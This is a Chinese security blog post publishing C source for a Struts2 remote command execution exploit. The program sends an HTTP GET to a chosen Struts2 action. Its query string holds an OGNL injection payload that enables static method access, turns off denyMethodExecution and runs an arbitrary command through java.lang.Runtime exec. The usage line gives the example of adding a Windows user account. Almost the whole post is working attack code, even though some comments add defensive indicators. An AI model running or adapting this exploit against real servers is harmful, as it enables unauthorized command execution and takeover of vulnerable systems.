
K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

C语言版 Struts2 remote command exploit 2010  

2013-06-10 10:55:35|  分类: C/C++ |  标签: |举报 |字号 订阅


Struts2 remote command exploit
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

// File-wide connection state shared by InitSocket(), ConnectServer() and HttpGet().
// Only one connection exists at a time; nothing here is safe for concurrent use.

// TCP socket handle: created in InitSocket(), closed in ConnectServer() on a
// failed connect and in HttpGet() after the reply has been read.
SOCKET sock;
// Remote endpoint (IPv4 address and port): filled by InitSocket(), passed to connect().
struct sockaddr_in client;
// Winsock startup data written by WSAStartup() in InitSocket().
WSADATA wsa;
// Result of the last gethostbyname() call in InitSocket(); the pointed-to
// storage belongs to Winsock and must not be freed here.
struct hostent *host;

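/*
 * Start Winsock, resolve Host to an IPv4 address, fill the global `client`
 * endpoint and create the global TCP socket `sock`.
 *
 * Host  name or dotted address handed to gethostbyname().
 * Port  TCP port in host byte order; must fit in 16 bits.
 *
 * Returns 1 on success, 0 on failure. On every failure path after a
 * successful WSAStartup() the function calls WSACleanup() itself, so the
 * caller only cleans up after a return value of 1.
 */
int InitSocket(char *Host,unsigned int Port)
{
	/* htons() takes a 16-bit value; reject anything it would silently truncate. */
	if(Host == NULL || Port == 0 || Port > 65535)
	{
		printf("[-]socket_inaddr init error!\r\n");
		return 0;
	}

	if(WSAStartup(MAKEWORD(2,2),&wsa) != 0)
	{
		printf("[-]WSAStartup Error!\r\n");
		return 0;
	}

	/*
	 * gethostbyname() returns NULL when the name does not resolve. The
	 * original wrapped the dereference in try/catch(...), which does not
	 * reliably intercept an access violation, so the result is checked
	 * explicitly instead.
	 */
	host = gethostbyname(Host);
	if(host == NULL
		|| host->h_addrtype != AF_INET
		|| host->h_addr_list[0] == NULL
		|| host->h_length != (int)sizeof(client.sin_addr))
	{
		printf("[-]socket_inaddr init error!\r\n");
		WSACleanup();
		return 0;
	}

	memset(&client,0,sizeof(client));
	/*
	 * Copy exactly one IPv4 address. The original used
	 * sizeof(host->h_addr_list[0]), i.e. the size of a pointer, which
	 * writes past sin_addr on 64-bit builds.
	 */
	memcpy(&client.sin_addr,host->h_addr_list[0],sizeof(client.sin_addr));
	client.sin_family = AF_INET;
	client.sin_port = htons((u_short)Port);

	sock = socket(AF_INET,SOCK_STREAM,0);
	/* socket() reports failure as INVALID_SOCKET, not SOCKET_ERROR. */
	if(sock == INVALID_SOCKET)
	{
		printf("[-]socket create error!\r\n");
		WSACleanup();
		return 0;
	}
	printf("[+]Socket Init success!\r\n");

	return 1;
}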

/*
 * Prepare the global socket through InitSocket() and connect it to Host:Port.
 *
 * Returns 1 when the TCP connection is established, 0 otherwise. When
 * connect() fails, the socket is closed and Winsock is shut down here.
 */
int ConnectServer(char *Host,unsigned int Port)
{
	int rc;

	printf("Init socket...\r\n");
	if(InitSocket(Host,Port) == 0)
	{
		return 0;
	}

	printf("Connect the Server...\r\n");
	rc = connect(sock,(struct sockaddr *)&client,sizeof(client));
	if(rc != SOCKET_ERROR)
	{
		printf("[+]Connect successfull!\r\n");
		return 1;
	}

	/* Failed connect: release what InitSocket() acquired. */
	printf("[-]Connect Error!\r\n");
	closesocket(sock);
	WSACleanup();
	return 0;
}

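/*
 * Send one HTTP GET for "/<Req>" to Host:Port on a fresh connection and
 * return whatever the first recv() delivers.
 *
 * Host  target host name, also used for the Host: header.
 * Port  target TCP port.
 * Req   request path and query string, placed after the leading '/'.
 *
 * Returns a pointer to a NUL-terminated static buffer holding the reply, or
 * NULL on any failure (request too long, connect/send/recv error, empty
 * reply). The buffer is overwritten by the next call and is not thread-safe.
 *
 * Changes from the original:
 *   - the request is length-checked before sprintf() (req_buf overflow),
 *   - the reply is NUL-terminated before being printed with %s and is only
 *     printed when recv() actually returned data,
 *   - the reply buffer is static, because the original returned the address
 *     of a stack array that no longer exists once the function returns,
 *   - a failed connection returns NULL instead of calling exit(0).
 *
 * The reply comes from an untrusted peer and is echoed to the console
 * unfiltered; it may be compressed (the request advertises gzip) or contain
 * control characters.
 */
char *HttpGet(char *Host,unsigned int Port,char *Req)
{
	int size;
	static const char http_header[] = "GET /%s  HTTP/1.1\r\n"
	"Host: %s\r\n"
	"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
	"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
	"Accept-Language: zh-cn,zh;q=0.5\r\n"
	"Accept-Encoding: gzip,deflate\r\n"
	"Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n"
	"Connection: Closed\r\n\r\n";
	char req_buf[4096];
	static char recvbuf[20480];
	char *ret = NULL;

	if(Host == NULL || Req == NULL)
	{
		return NULL;
	}

	/*
	 * sizeof(http_header) already counts the two "%s" markers and the
	 * terminating NUL, so this sum is a safe upper bound for the output.
	 */
	if(strlen(Req) + strlen(Host) + sizeof(http_header) > sizeof(req_buf))
	{
		printf("[-]Request too long!\r\n");
		return NULL;
	}
	sprintf(req_buf,http_header,Req,Host);

	/* ConnectServer() has already cleaned up when it reports failure. */
	if(!ConnectServer(Host,Port))
	{
		return NULL;
	}

	printf("Send payload:\r\n%s\r\n",req_buf);
	size = send(sock,req_buf,(int)strlen(req_buf),0);
	if(size == SOCKET_ERROR)
	{
		printf("[-]send error!\r\n");
	}
	else
	{
		printf("[+]send payload %d bytes!\r\n",size);
		/* Leave one byte free so the reply can always be terminated. */
		size = recv(sock,recvbuf,(int)sizeof(recvbuf) - 1,0);
		if(size > 0)
		{
			recvbuf[size] = '\0';
			printf("[+]Response:\r\n%s\r\n",recvbuf);
			ret = recvbuf;
		}
		else
		{
			printf("[-]recv error or empty response!\r\n");
		}
	}

	closesocket(sock);
	WSACleanup();

	return ret;
}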

/*
 * Print the banner, the command-line synopsis and one example invocation,
 * then terminate the process with exit status -1. Never returns.
 */
void usage()
{
	static const char *const lines[] = {
		"\t\tStruts2 Remote Command Exploit\r\n\t\t\t\t\t\t\tconcat:ylbhz@hotmail.com\r\n",
		"Usage: struts2exp <target> <port> <reqfile> <cmd>\r\n",
		"Example: struts2exp localhost 8080 struts2Test/index.action \"net user ylbhz 123 /add\"\r\n\r\n",
	};
	size_t k;

	/* None of the lines contains a conversion specifier, so fputs() emits
	 * exactly what printf() would. */
	for(k = 0; k < sizeof(lines) / sizeof(lines[0]); k++)
	{
		fputs(lines[k],stdout);
	}
	exit(-1);
}
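/*
 * Return a heap copy of cmd in which every space is replaced by '+'.
 * No other character is changed or escaped.
 *
 * cmd  NUL-terminated input string; may be NULL.
 *
 * Returns a malloc()ed string the caller must free(), or NULL when cmd is
 * NULL or the allocation fails.
 *
 * The original always allocated 256 bytes and wrote past them for longer
 * input, did not check malloc(), and stored the pointer constant NULL as
 * the terminator; the buffer is now sized from the input.
 */
char *handlecmd(char *cmd) // prepare the cmd string: replace every space with '+'
{
	size_t len;
	size_t i;
	char *ret;

	if(cmd == NULL)
	{
		return NULL;
	}

	len = strlen(cmd);
	ret = (char*)malloc(len + 1);
	if(ret == NULL)
	{
		return NULL;
	}

	for(i = 0; i < len; i++)
	{
		ret[i] = (cmd[i] == ' ') ? '+' : cmd[i];
	}
	ret[len] = '\0';
	return ret;
}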
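/*
 * Command-line entry point: struts2exp <target> <port> <reqfile> <cmd>.
 * Builds one GET request from the arguments and hands it to HttpGet().
 *
 * Returns 0 after the request was attempted, -1 when the request could not
 * be built; usage() exits with -1 on bad arguments.
 *
 * Reading the request from the defender's side (every token named here is
 * visible in the format string below): the query string is made of
 * parameter *names* that are OGNL expressions, with '#' and '=' written as
 * the backslash-u escapes u0023 and u003d. They set
 * _memberAccess['allowStaticMethodAccess'] to true and
 * xwork.MethodAccessor.denyMethodExecution to false, then call
 * java.lang.Runtime exec with the <cmd> argument. Those literal tokens in
 * the URI of a request to a Struts2 action are high-signal indicators for
 * access-log review and request filtering. The durable fix is on the server:
 * run a Struts2/XWork release that no longer evaluates parameter names this
 * way (see the vendor's security bulletins).
 *
 * Changes from the original: main returns int, the port is parsed with
 * strtoul() and range-checked (atoi() plus an unsigned cast accepted
 * negative and oversized values), the request is length-checked before
 * sprintf() into sendbuf, and the handlecmd() buffer is checked and freed.
 */
int main(int argc,char *argv[])
{
	if(argc != 5) usage();

	char *end = NULL;
	unsigned long parsed = strtoul(argv[2],&end,10);
	if(end == argv[2] || *end != '\0' || parsed == 0 || parsed > 65535) usage();
	unsigned int Port = (unsigned int)parsed;

	char *Target = argv[1];
	char *ReqFile = argv[3];
	char *cmd = argv[4];

	char payload[] = "%s?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew+java.lang.Boolean(\"false\")))&(asdf)(('\\u0023rt.exec(\"%s\")')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()))=1";
	char sendbuf[2048];

	char *encoded = handlecmd(cmd);
	if(encoded == NULL)
	{
		printf("[-]out of memory!\r\n");
		return -1;
	}

	/*
	 * sizeof(payload) counts both "%s" markers and the NUL, so the sum is
	 * a safe upper bound for what sprintf() will write.
	 */
	if(strlen(ReqFile) + strlen(encoded) + sizeof(payload) > sizeof(sendbuf))
	{
		printf("[-]request too long!\r\n");
		free(encoded);
		return -1;
	}

	sprintf(sendbuf,payload,ReqFile,encoded);
	free(encoded);
	HttpGet(Target,Port,sendbuf);
	return 0;
}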